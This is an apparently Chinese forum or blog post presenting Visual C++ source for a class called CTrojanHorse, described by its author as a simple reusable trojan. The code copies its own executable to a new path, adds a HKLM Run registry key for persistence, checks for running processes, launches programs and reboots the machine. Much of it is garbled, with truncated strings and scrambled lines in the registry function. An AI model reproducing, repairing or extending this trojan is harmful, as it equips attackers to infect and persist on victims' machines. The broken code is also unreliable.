Visual C++编程时用到了这些功能,现在我把它组装成一个很简单的木马了.
本代码已封装成类方便代码重用 :1,自我复制.2,修改注册表自动运行.3,关闭进程.4,启动程序.5,重启关机功能.
交流
class CTrojanHorse
{
public://add code
public://add code
CTrojanHorse();
~CTrojanHorse();
protected://add code
BOOL IfShell(CString BeKissPrcName);
BOOL CopyFileaddr(CString m_CopyFile);
void ShellFile(CString m_ShellFile);
BOOL SetAutoRun(CString strPath);
void ShutDown();
private://add code
};
CTrojanHorse::CTrojanHorse()
{
//add code
}
CTrojanHorse::~CTrojanHorse()
{
//add code
}
BOOL CTrojanHorse::IfShell(CString BeKissPrcName)//判断程序是否在运行
{
CString str,a,prcnum;
// CMainFrame *pDlg=(CMainFrame *)lparam;
//AfxMessageBox(pDlg->BeKissPrcName);
HANDLE SnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
SHFILEINFO shSmall;
PROCESSENTRY32 ProcessInfo;//声明进程信息变量
ProcessInfo.dwSize=sizeof(ProcessInfo);//设置ProcessInfo的大小
//返回系统中第一个进程的信息
BOOL Status=Process32First(SnapShot,&ProcessInfo);
int m_nProcess=0;
int num=0;
while(Status)
{ num++;
m_nProcess++;
ZeroMemory(&shSmall,sizeof(shSmall));//获取进程文件信息
SHGetFileInfo(ProcessInfo.szExeFile,0,&shSmall,
sizeof(shSmall),SHGFI_ICON|SHGFI_SMALLICON);
//str.Format(\"%08x\
str=ProcessInfo.szExeFile;
if(str==BeKissPrcName)
{
AfxMessageBox(\"找到进程成功!\");
return true;
}
//获取下一个进程的信息
Status=Process32Next(SnapShot,&ProcessInfo);
}
AfxMessageBox(\"失败!\");
return false;
}
BOOL CTrojanHorse::CopyFileaddr(CString m_CopyFile)//复制文件
{
char pBuf[MAX_PATH];
CString m_addr;
// CString m_strSrcFile1=\"D:/OperateFile.exe\";
// CString m_addr=\"D:/SVCLSV.exe\"; //存放路径的变量
GetCurrentDirectory(MAX_PATH,pBuf); //获取程序的当前目录
strcat(pBuf,\"\\\\\");
strcat(pBuf,AfxGetApp()->m_pszExeName);
strcat(pBuf,\".exe\");
m_addr=pBuf;
if(CopyFile(m_addr,m_CopyFile,FALSE))
{
AfxMessageBox(\"复制成功!\");
return true;
}
return false;
}
void CTrojanHorse::ShellFile(CString m_ShellFile)//执行所要的程序
{
ShellExecute(NULL,\"open\
}
BOOL CTrojanHorse::SetAutoRun(CString strPath)//修改注册表
{
CString str;
HKEY hRegKey;
BOOL bResult;
str=_T(\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\");
if(RegOpenKey(HKEY_LOCAL_MACHINE, ERROR_SUCCESS)
str, &hRegKey) !=
bResult=FALSE;
else
{
_splitpath(strPath.GetBuffer(0),NULL,NULL,str.GetBufferSetLength(MAX_PATH+1),NULL);
strPath.ReleaseBuffer();
str.ReleaseBuffer();
if(::RegSetValueEx( hRegKey,
bResult=FALSE; else
bResult=TRUE; strPath.ReleaseBuffer(); }
str,
0,
REG_SZ,
(CONST BYTE *)strPath.GetBuffer(0),
strPath.GetLength() ) != ERROR_SUCCESS)
return bResult;
}
void CTrojanHorse::ShutDown()//重新启动计算机
{
if (IDYES == MessageBox(\"是否现在重新启动计算机?\\"注册表提示\MB_YESNO))
{
OSVERSIONINFO OsVerInfo; //保存系统版本信息的数据结构
OsVerInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&OsVerInfo);//取得系统的版本信息
CString str1 = \"\
str1.Format(\"你的系统信息\\n版本为:%d.%d\\n\
OsVerInfo.dwMinorVersion);
str2.Format(\"型号:%d\\n\
str1 += str2;
AfxMessageBox(str1);
if(OsVerInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
ExitWindowsEx(EWX_REBOOT | EWX_SHUTDOWN, 0); //重新启动计算机
}
}
因篇幅问题不能全部显示,请点此查看更多更全内容